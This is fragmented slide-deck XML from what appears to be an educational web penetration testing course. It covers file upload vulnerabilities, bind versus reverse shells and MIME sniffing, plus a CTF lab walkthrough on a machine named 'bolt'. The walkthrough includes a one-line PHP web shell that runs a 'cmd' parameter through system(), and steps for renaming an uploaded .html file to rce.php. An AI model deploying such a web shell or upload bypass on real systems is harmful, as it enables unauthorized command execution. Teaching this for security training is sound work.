                  <a:pt x="6289688" y="-10815"/>
                  <a:pt x="6820309" y="61182"/>
                  <a:pt x="7031795" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7098500" y="255477"/>
                  <a:pt x="7001362" y="344372"/>
                  <a:pt x="7031795" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6921980" y="587037"/>
                  <a:pt x="6740696" y="564355"/>
                  <a:pt x="6586448" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6432200" y="605195"/>
                  <a:pt x="6163899" y="566228"/>
                  <a:pt x="5930147" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5696395" y="603322"/>
                  <a:pt x="5570261" y="514402"/>
                  <a:pt x="5273846" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4977431" y="655148"/>
                  <a:pt x="5039749" y="552626"/>
                  <a:pt x="4828499" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4617249" y="616924"/>
                  <a:pt x="4411474" y="568287"/>
                  <a:pt x="4242516" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4073558" y="601263"/>
                  <a:pt x="4000519" y="561520"/>
                  <a:pt x="3797169" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3593819" y="608030"/>
                  <a:pt x="3470735" y="583189"/>
                  <a:pt x="3351822" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3232909" y="586361"/>
                  <a:pt x="3154992" y="563587"/>
                  <a:pt x="2976793" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2798594" y="605963"/>
                  <a:pt x="2784332" y="540333"/>
                  <a:pt x="2601764" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2419196" y="629217"/>
                  <a:pt x="2292364" y="568972"/>
                  <a:pt x="2156417" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2020470" y="600578"/>
                  <a:pt x="1770171" y="573820"/>
                  <a:pt x="1640752" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1511334" y="595730"/>
                  <a:pt x="1194022" y="570470"/>
                  <a:pt x="914133" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="634244" y="599080"/>
                  <a:pt x="309704" y="535647"/>
                  <a:pt x="0" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-37872" y="391194"/>
                  <a:pt x="58918" y="158477"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
              <a:path w="7031795" h="584775" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="261973" y="-23118"/>
                  <a:pt x="463892" y="55999"/>
                  <a:pt x="656301" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="848710" y="-55999"/>
                  <a:pt x="1199121" y="76976"/>
                  <a:pt x="1382920" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1566719" y="-76976"/>
                  <a:pt x="1921367" y="16882"/>
                  <a:pt x="2109539" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2297711" y="-16882"/>
                  <a:pt x="2563195" y="10316"/>
                  <a:pt x="2695521" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2827847" y="-10316"/>
                  <a:pt x="2921862" y="22831"/>
                  <a:pt x="3070550" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3219238" y="-22831"/>
                  <a:pt x="3417313" y="70413"/>
                  <a:pt x="3726851" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4036389" y="-70413"/>
                  <a:pt x="4025984" y="33354"/>
                  <a:pt x="4312834" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4599684" y="-33354"/>
                  <a:pt x="4725006" y="814"/>
                  <a:pt x="4828499" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4931993" y="-814"/>
                  <a:pt x="5163677" y="50693"/>
                  <a:pt x="5344164" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5524651" y="-50693"/>
                  <a:pt x="5768972" y="3749"/>
                  <a:pt x="6070783" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6372594" y="-3749"/>
                  <a:pt x="6339515" y="38963"/>
                  <a:pt x="6516130" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6692745" y="-38963"/>
                  <a:pt x="6905541" y="57731"/>
                  <a:pt x="7031795" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7063748" y="140904"/>
                  <a:pt x="7018140" y="426268"/>
                  <a:pt x="7031795" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6852347" y="612333"/>
                  <a:pt x="6843429" y="565496"/>
                  <a:pt x="6656766" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6470103" y="604054"/>
                  <a:pt x="6085678" y="525375"/>
                  <a:pt x="5930147" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5774616" y="644175"/>
                  <a:pt x="5645622" y="540520"/>
                  <a:pt x="5484800" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5323978" y="629030"/>
                  <a:pt x="5093625" y="523613"/>
                  <a:pt x="4969135" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4844646" y="645937"/>
                  <a:pt x="4589563" y="576404"/>
                  <a:pt x="4383152" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4176741" y="593146"/>
                  <a:pt x="4101134" y="544688"/>
                  <a:pt x="3867487" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3633841" y="624862"/>
                  <a:pt x="3569550" y="544074"/>
                  <a:pt x="3351822" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3134095" y="625476"/>
                  <a:pt x="2900529" y="548734"/>
                  <a:pt x="2625203" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2349877" y="620816"/>
                  <a:pt x="2110614" y="508277"/>
                  <a:pt x="1898585" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1686556" y="661273"/>
                  <a:pt x="1555762" y="564385"/>
                  <a:pt x="1242284" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="928806" y="605165"/>
                  <a:pt x="970976" y="575439"/>
                  <a:pt x="796937" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="622898" y="594111"/>
                  <a:pt x="281144" y="574205"/>
                  <a:pt x="0" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-28018" y="463856"/>
                  <a:pt x="68849" y="19414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&lt;?php echo system($_GET['cmd']);?&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="C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9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1" y="735982"/>
            <a:ext cx="6847986" cy="360614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89" name="Google Shape;289;p19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6980665" y="2156251"/>
            <a:ext cx="1940312" cy="1200329"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1940312" h="1200329" fill="none" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="175295" y="-25801"/>
                  <a:pt x="317650" y="48000"/>
                  <a:pt x="446272" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="574894" y="-48000"/>
                  <a:pt x="816843" y="36730"/>
                  <a:pt x="950753" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1084663" y="-36730"/>
                  <a:pt x="1256681" y="9422"/>
                  <a:pt x="1397025" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1537369" y="-9422"/>
                  <a:pt x="1818001" y="21051"/>
                  <a:pt x="1940312" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1977972" y="116347"/>
                  <a:pt x="1908282" y="236076"/>
                  <a:pt x="1940312" y="364100"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1972342" y="492124"/>
                  <a:pt x="1915862" y="648813"/>
                  <a:pt x="1940312" y="788216"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1964762" y="927619"/>
                  <a:pt x="1922058" y="998501"/>
                  <a:pt x="1940312" y="1200329"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1747880" y="1221483"/>
                  <a:pt x="1604680" y="1190001"/>
                  <a:pt x="1435831" y="1200329"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1266982" y="1210657"/>
                  <a:pt x="1099150" y="1187653"/>
                  <a:pt x="931350" y="1200329"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="763550" y="1213005"/>
                  <a:pt x="390093" y="1189606"/>
                  <a:pt x="0" y="1200329"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-18133" y="1032582"/>
                  <a:pt x="20060" y="910240"/>
                  <a:pt x="0" y="812223"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-20060" y="714206"/>
                  <a:pt x="18315" y="599033"/>
                  <a:pt x="0" y="436120"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-18315" y="273207"/>
                  <a:pt x="1433" y="154844"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
              <a:path w="1940312" h="1200329" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="221224" y="-14201"/>
                  <a:pt x="357736" y="28011"/>
                  <a:pt x="504481" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="651226" y="-28011"/>
                  <a:pt x="852084" y="21760"/>
                  <a:pt x="1028365" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1204646" y="-21760"/>
                  <a:pt x="1744731" y="58576"/>
                  <a:pt x="1940312" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1953448" y="179652"/>
                  <a:pt x="1913092" y="319345"/>
                  <a:pt x="1940312" y="400110"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1967532" y="480875"/>
                  <a:pt x="1937203" y="655758"/>
                  <a:pt x="1940312" y="800219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1943421" y="944680"/>
                  <a:pt x="1924337" y="1054333"/>
                  <a:pt x="1940312" y="1200329"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1723561" y="1227423"/>
                  <a:pt x="1627412" y="1165863"/>
                  <a:pt x="1455234" y="1200329"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1283056" y="1234795"/>
                  <a:pt x="1199293" y="1151345"/>
                  <a:pt x="950753" y="1200329"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="702213" y="1249313"/>
                  <a:pt x="644116" y="1194828"/>
                  <a:pt x="504481" y="1200329"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="364846" y="1205830"/>
                  <a:pt x="171444" y="1195140"/>
                  <a:pt x="0" y="1200329"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-29384" y="1020019"/>
                  <a:pt x="22110" y="991740"/>
                  <a:pt x="0" y="836229"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-22110" y="680718"/>
                  <a:pt x="24189" y="575746"/>
                  <a:pt x="0" y="460126"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-24189" y="344506"/>
                  <a:pt x="17287" y="109989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can’t upload php file:</a:t>
            </a:r>
            <a:endParaRPr sz="18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5374243" y="1768643"/>
            <a:ext cx="3651810" cy="210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924496" y="1127410"/>
            <a:ext cx="4449747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Course Overview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Source code examination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Default credentials lookup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File upload vulnerabilities and how they work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REVSHELL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Machine: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bolt</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="122" name="Google Shape;122;p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20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1" y="735982"/>
            <a:ext cx="6847986" cy="360614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98" name="Google Shape;298;p20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6980665" y="2156251"/>
            <a:ext cx="1940312" cy="830997"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1940312" h="830997" fill="none" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="192177" y="-19692"/>
                  <a:pt x="342550" y="23379"/>
                  <a:pt x="446272" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="549994" y="-23379"/>
                  <a:pt x="767977" y="38928"/>
                  <a:pt x="950753" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1133529" y="-38928"/>
                  <a:pt x="1285431" y="23452"/>
                  <a:pt x="1377622" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1469813" y="-23452"/>
                  <a:pt x="1714816" y="43545"/>
                  <a:pt x="1940312" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1957006" y="114548"/>
                  <a:pt x="1895966" y="280497"/>
                  <a:pt x="1940312" y="398879"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1984658" y="517261"/>
                  <a:pt x="1907311" y="629148"/>
                  <a:pt x="1940312" y="830997"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1805316" y="831724"/>
                  <a:pt x="1580800" y="798397"/>
                  <a:pt x="1474637" y="830997"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1368474" y="863597"/>
                  <a:pt x="1229004" y="812618"/>
                  <a:pt x="989559" y="830997"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="750114" y="849376"/>
                  <a:pt x="639984" y="793216"/>
                  <a:pt x="543287" y="830997"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="446590" y="868778"/>
                  <a:pt x="199077" y="824025"/>
                  <a:pt x="0" y="830997"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-45501" y="696351"/>
                  <a:pt x="37564" y="546286"/>
                  <a:pt x="0" y="407189"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-37564" y="268092"/>
                  <a:pt x="44515" y="120117"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
              <a:path w="1940312" h="830997" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="221224" y="-14201"/>
                  <a:pt x="357736" y="28011"/>
                  <a:pt x="504481" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="651226" y="-28011"/>
                  <a:pt x="852084" y="21760"/>
                  <a:pt x="1028365" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1204646" y="-21760"/>
                  <a:pt x="1744731" y="58576"/>
                  <a:pt x="1940312" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1971018" y="127101"/>
                  <a:pt x="1908502" y="317669"/>
                  <a:pt x="1940312" y="415499"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1972122" y="513329"/>
                  <a:pt x="1913972" y="697005"/>
                  <a:pt x="1940312" y="830997"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1802590" y="854734"/>
                  <a:pt x="1556037" y="828774"/>
                  <a:pt x="1455234" y="830997"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1354431" y="833220"/>
                  <a:pt x="1171984" y="790437"/>
                  <a:pt x="931350" y="830997"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="690716" y="871557"/>
                  <a:pt x="675409" y="782013"/>
                  <a:pt x="426869" y="830997"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="178329" y="879981"/>
                  <a:pt x="154786" y="823203"/>
                  <a:pt x="0" y="830997"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-43728" y="636371"/>
                  <a:pt x="2920" y="509876"/>
                  <a:pt x="0" y="415499"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-2920" y="321122"/>
                  <a:pt x="7186" y="159756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Try to upload as .html</a:t>
            </a:r>
            <a:endParaRPr sz="18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-71092" y="411800"/>
            <a:ext cx="45794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change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extension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.php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into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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1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1" y="740535"/>
            <a:ext cx="6847986" cy="3597033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08" name="Google Shape;308;p21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7025270" y="2308218"/>
            <a:ext cx="1940312" cy="461665"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1940312" h="461665" fill="none" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="185722" y="-35426"/>
                  <a:pt x="337025" y="31345"/>
                  <a:pt x="426869" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="516713" y="-31345"/>
                  <a:pt x="715990" y="18000"/>
                  <a:pt x="853737" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="991484" y="-18000"/>
                  <a:pt x="1138901" y="36991"/>
                  <a:pt x="1280606" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1422311" y="-36991"/>
                  <a:pt x="1614052" y="38837"/>
                  <a:pt x="1940312" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1964201" y="176466"/>
                  <a:pt x="1897620" y="242978"/>
                  <a:pt x="1940312" y="461665"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1792701" y="463439"/>
                  <a:pt x="1602092" y="426399"/>
                  <a:pt x="1474637" y="461665"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1347183" y="496931"/>
                  <a:pt x="1112832" y="411356"/>
                  <a:pt x="950753" y="461665"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="788674" y="511974"/>
                  <a:pt x="638845" y="437573"/>
                  <a:pt x="504481" y="461665"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="370117" y="485757"/>
                  <a:pt x="229616" y="418562"/>
                  <a:pt x="0" y="461665"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-23936" y="261376"/>
                  <a:pt x="338" y="105563"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
              <a:path w="1940312" h="461665" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="221224" y="-14201"/>
                  <a:pt x="357736" y="28011"/>
                  <a:pt x="504481" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="651226" y="-28011"/>
                  <a:pt x="852084" y="21760"/>
                  <a:pt x="1028365" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1204646" y="-21760"/>
                  <a:pt x="1744731" y="58576"/>
                  <a:pt x="1940312" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1984551" y="171454"/>
                  <a:pt x="1910955" y="234411"/>
                  <a:pt x="1940312" y="461665"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1797794" y="512727"/>
                  <a:pt x="1610172" y="416937"/>
                  <a:pt x="1455234" y="461665"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1300296" y="506393"/>
                  <a:pt x="1098475" y="409268"/>
                  <a:pt x="989559" y="461665"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="880644" y="514062"/>
                  <a:pt x="706309" y="421105"/>
                  <a:pt x="465675" y="461665"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="225041" y="502225"/>
                  <a:pt x="160586" y="431765"/>
                  <a:pt x="0" y="461665"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-4800" y="252535"/>
                  <a:pt x="27628" y="9599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Perfect !</a:t>
            </a:r>
            <a:endParaRPr sz="18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2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777" y="773233"/>
            <a:ext cx="6820443" cy="3597033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17" name="Google Shape;317;p22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-7435" y="400929"/>
            <a:ext cx="45794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click to the file, it starts editing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2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1" y="792944"/>
            <a:ext cx="6007813" cy="306375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26" name="Google Shape;326;p23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8491" y="369100"/>
            <a:ext cx="45780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options and rename the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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rce.html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to </a:t>
            </a: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rce.php</a:t>
            </a:r>
            <a:endParaRPr sz="12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8278" y="2693825"/>
            <a:ext cx="4367231" cy="1734425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="EA4153"/>
            </a:solidFill>
            <a:prstDash val="dash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2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1" y="874248"/>
            <a:ext cx="4039941" cy="123260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36" name="Google Shape;336;p24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5834264" y="1696476"/>
            <a:ext cx="14875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cmd</a:t>
            </a:r>
            <a:endParaRPr sz="12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9646" y="2003648"/>
            <a:ext cx="6062176" cy="1232604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8501" y="3532388"/>
            <a:ext cx="8335499" cy="97553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40" name="Google Shape;340;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="146303" y="635574"/>
            <a:ext cx="45780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Click on rce.php</a:t>
            </a:r>
            <a:endParaRPr sz="12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2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Laboratory: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bolt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842683"/>
            <a:ext cx="9144000" cy="1509777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349" name="Google Shape;349;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1508058"/>
            <a:ext cx="45780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CTF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2804161" y="1685925"/>
            <a:ext cx="42821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33B81"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Thank you for Attention!</a:t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6105288" y="1596811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513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 descr="A picture containing application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4559179" y="994336"/>
            <a:ext cx="4491510" cy="377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2462721" y="28627"/>
            <a:ext cx="41929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52831"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Web Penetration Testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="EA4153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223860" y="1651846"/>
            <a:ext cx="41242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Educational Purposes Only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06503" y="2529216"/>
            <a:ext cx="32746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either case,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hacking without </a:t>
            </a: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customer’s explicit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permission</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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and direction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 a crime.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4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A94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2667697" y="5750"/>
            <a:ext cx="3808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BIND SHELL vs REVERSE SHELL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819216" y="4768417"/>
            <a:ext cx="5505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shell is a software that acts as an intermediary between the user and the kernel. It provides the user with an interface which provides access to the services of the kernel. Eg: Bash Shell, etc.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880990" y="1178063"/>
            <a:ext cx="1531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BIND SHELL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6161649" y="1178062"/>
            <a:ext cx="19249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REVERSE SHELL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87084" y="1765221"/>
            <a:ext cx="365492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Bind shells have the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1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listener running</a:t>
            </a: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 on the target and the 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attacker connect to the listener</a:t>
            </a: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 in order to gain a remote shell.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9292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To launch a bind shell, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1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attacker must have the IP address</a:t>
            </a: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victim to access the target computer.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5113939" y="1765221"/>
            <a:ext cx="365492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Reverse shells have the listener running on the attacker and the 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target connects to the attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0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with a shell.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9292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To launch a Reverse shell, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1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the attacker doesn’t need to know the IP address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>of the victim to access the target computer.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>
            <a:off x="4438358" y="1292389"/>
            <a:ext cx="0" cy="253262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47" name="Google Shape;147;p4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103" y="3566901"/>
            <a:ext cx="3354884" cy="98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3977" y="3576229"/>
            <a:ext cx="3354884" cy="96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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3021497" y="0"/>
            <a:ext cx="25015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Reverse-Shell</a:t>
            </a:r>
            <a:endParaRPr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70" y="813373"/>
            <a:ext cx="4795710" cy="72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5" y="1833803"/>
            <a:ext cx="7144733" cy="35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435" y="2430274"/>
            <a:ext cx="4803944" cy="23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58434" y="609537"/>
            <a:ext cx="121707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Kali Terminal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58434" y="1623993"/>
            <a:ext cx="149842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 Windows CMD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58433" y="2228124"/>
            <a:ext cx="22174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 Result in Kali Terminal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5619262" y="2741535"/>
            <a:ext cx="316980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reverse shell initiates a connection from the compromised host back to a host under the control of the attacker.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="161" name="Google Shape;161;p5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2A94C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2824889" y="33987"/>
            <a:ext cx="349422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Types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(Multipurpose Internet Mail Extensions)</a:t>
            </a:r>
            <a:endParaRPr sz="7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80490" y="1180785"/>
            <a:ext cx="449151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media type (also known as a Multipurpose Internet Mail Extensions or MIME type) indicates the nature and format of a document, file, or assortment of bytes.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types are defined and standardized in IETF's RFC 6838.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Internet Assigned Numbers Authority (IANA) is responsible for all official MIME types, and you can find the most up-to-date and complete list at their </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="0" u="sng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Media Types page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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="171" name="Google Shape;171;p6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 amt="70000"/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5057942" y="1202529"/>
            <a:ext cx="3463437" cy="30051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2824889" y="33987"/>
            <a:ext cx="349422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Types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(Multipurpose Internet Mail Extensions)</a:t>
            </a:r>
            <a:endParaRPr sz="7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80489" y="1232921"/>
            <a:ext cx="502676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 MIME type most-commonly consists of just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two parts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a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subtype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separated by a slash (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/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) — with no whitespace between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represents the general category into which the data type falls, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1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video or text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subtype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identifies the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exact kind of data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specified type the MIME type represents. For example, for the MIME type image, the subtype might be png &gt;&gt; image/png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495683" y="2340917"/>
            <a:ext cx="3092605" cy="461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type/subtype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2824889" y="33987"/>
            <a:ext cx="349422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Types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(Multipurpose Internet Mail Extensions)</a:t>
            </a:r>
            <a:endParaRPr sz="7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6" name="Google Shape;186;p8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80489" y="1232921"/>
            <a:ext cx="40902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the absence of a MIME type, or in certain cases where browsers believe they are incorrect, browsers may perform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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sniffing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— guessing the correct MIME type by looking at the bytes of the resource.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Each browser performs MIME sniffing differently and under different circumstances. (For example, Safari will look at the file extension in the URL if the sent MIME type is unsuitable.)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security concerns as some MIME types represent executable content.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Servers can prevent MIME sniffing by sending the X-Content-Type-Options header.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80489" y="733481"/>
            <a:ext cx="14812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MIME sniffing</a:t>
            </a:r>
